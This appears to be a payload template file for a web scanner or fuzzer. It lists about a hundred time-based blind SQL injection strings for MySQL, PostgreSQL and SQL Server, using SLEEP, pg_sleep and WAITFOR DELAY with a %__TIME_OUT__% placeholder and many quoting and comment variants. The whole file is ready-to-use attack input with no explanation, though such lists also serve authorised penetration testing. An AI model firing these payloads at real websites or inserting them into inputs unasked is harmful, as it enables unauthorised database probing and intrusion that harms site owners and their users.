;SELECT IF((8303>8302),SLEEP(%__TIME_OUT__%),2356)#
'+AND+(SELECT+2016+FROM+(SELECT(SLEEP(%__TIME_OUT__%)))SIfv)+AND+'vDZP'%3d'vDZP
1 AND (SELECT 5230 FROM (SELECT(SLEEP(%__TIME_OUT__%)))SUmc
'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%*1),0))OR'
``0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%*1),0))XOR'Z.php``
"0'XOR(if(now()=sysdate(),sleep((%__TIME_OUT__%-1),0))XOR'Z"
"0"XOR(if(now()=sysdate()%2Csleep(%__TIME_OUT__%)%2C0))XOR"Z"
0'XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR'Z
0\"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR\"Z
"XOR(if(now()=sysdate(),sleep(%__TIME_OUT__%),0))XOR"
 1 or pg_sleep(%__TIME_OUT__%)--
 1) or pg_sleep(%__TIME_OUT__%)--
 1)) or pg_sleep(%__TIME_OUT__%)--
 1 or sleep(%__TIME_OUT__%)#
 1) or sleep(%__TIME_OUT__%)#
 1)) or sleep(%__TIME_OUT__%)#
 1') WAITFOR DELAY '%__TIME_OUT__%' AND ('1337'='1337
 1) WAITFOR DELAY '%__TIME_OUT__%' AND (1337=1337
';%5waitfor%5delay%5'%__TIME_OUT__%'%5--%5
 AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))bAKL) AND 'vRxe'='vRxe
 AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)
 AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)#
 AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))nQIP)--
 AND (SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))YjoC) AND '%'='
 AnD SLEEP(%__TIME_OUT__%)
 AnD SLEEP(%__TIME_OUT__%)#
 AnD SLEEP(%__TIME_OUT__%)--
' AnD SLEEP(%__TIME_OUT__%) ANd '1
 and WAITFOR DELAY '%__TIME_OUT__%'
 and WAITFOR DELAY '%__TIME_OUT__%'--
") IF (1=1) WAITFOR DELAY '%__TIME_OUT__%'--
 ORDER BY SLEEP(%__TIME_OUT__%)
 ORDER BY SLEEP(%__TIME_OUT__%)#
 ORDER BY SLEEP(%__TIME_OUT__%)--
" or pg_sleep(%__TIME_OUT__%)--
") or pg_sleep(%__TIME_OUT__%)--
")) or pg_sleep(%__TIME_OUT__%)--
' or pg_sleep(%__TIME_OUT__%)--
') or pg_sleep(%__TIME_OUT__%)--
')) or pg_sleep(%__TIME_OUT__%)--
 or pg_SLEEP(%__TIME_OUT__%)
 or pg_SLEEP(%__TIME_OUT__%)#
 or pg_SLEEP(%__TIME_OUT__%)--
" or sleep(%__TIME_OUT__%)#
" or sleep(%__TIME_OUT__%)="
") or sleep(%__TIME_OUT__%)="
")) or sleep(%__TIME_OUT__%)="
' or sleep(%__TIME_OUT__%)#
' or sleep(%__TIME_OUT__%)='
' OR SLEEP(%__TIME_OUT__%/7) -
') or sleep(%__TIME_OUT__%)='
')) or sleep(%__TIME_OUT__%)='
 or SLEEP(%__TIME_OUT__%)
 or SLEEP(%__TIME_OUT__%)#
 or SLEEP(%__TIME_OUT__%)--
 or SLEEP(%__TIME_OUT__%)="
 or SLEEP(%__TIME_OUT__%)='
 or WAITFOR DELAY '%__TIME_OUT__%'
 or WAITFOR DELAY '%__TIME_OUT__%'--
 pg_sleep(%__TIME_OUT__%)--
 pg_SLEEP(%__TIME_OUT__%)
 pg_SLEEP(%__TIME_OUT__%)#
 pg_SLEEP(%__TIME_OUT__%)--
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)#
(SELECT * FROM (SELECT(SLEEP(%__TIME_OUT__%)))ecMj)--
 sleep(%__TIME_OUT__%)#
&&SLEEP(%__TIME_OUT__%)
&&SLEEP(%__TIME_OUT__%)#
&&SLEEP(%__TIME_OUT__%)--
+ SLEEP(%__TIME_OUT__%) + '
 SLEEP(%__TIME_OUT__%)#
 SLEEP(%__TIME_OUT__%)--
 SLEEP(%__TIME_OUT__%)="
 SLEEP(%__TIME_OUT__%)='
'&&SLEEP(%__TIME_OUT__%)&&'1
 SLEEP(%__TIME_OUT__%)/*' or SLEEP(%__TIME_OUT__%) or '" or SLEEP(%__TIME_OUT__%) or "*/
"));waitfor delay '%__TIME_OUT__%'--
");waitfor delay '%__TIME_OUT__%'--
";waitfor delay '%__TIME_OUT__%'--
'));waitfor delay '%__TIME_OUT__%'--
');waitfor delay '%__TIME_OUT__%'--
';waitfor delay '%__TIME_OUT__%'--
));waitfor delay '%__TIME_OUT__%'--
);waitfor delay '%__TIME_OUT__%'--
;waitfor delay '%__TIME_OUT__%'--
 waitfor delay '%__TIME_OUT__%'
 waitfor delay '%__TIME_OUT__%'#
 waitfor delay '%__TIME_OUT__%'--
") WAITFOR DELAY '%__TIME_OUT__%'--
%' WAITFOR DELAY '%__TIME_OUT__%'--
'))) WAITFOR DELAY '%__TIME_OUT__%'--
';WAITFOR DELAY '%__TIME_OUT__%'--
'||pg_sleep(%__TIME_OUT__%)--
' AnD SLEEP(%__TIME_OUT__%) ANd '1
'+(select*from(select(sleep(%__TIME_OUT__%)))a)+'
') AND (SELECT 9683 FROM (SELECT(SLEEP(%__TIME_OUT__%)))FKuq)-- wXyW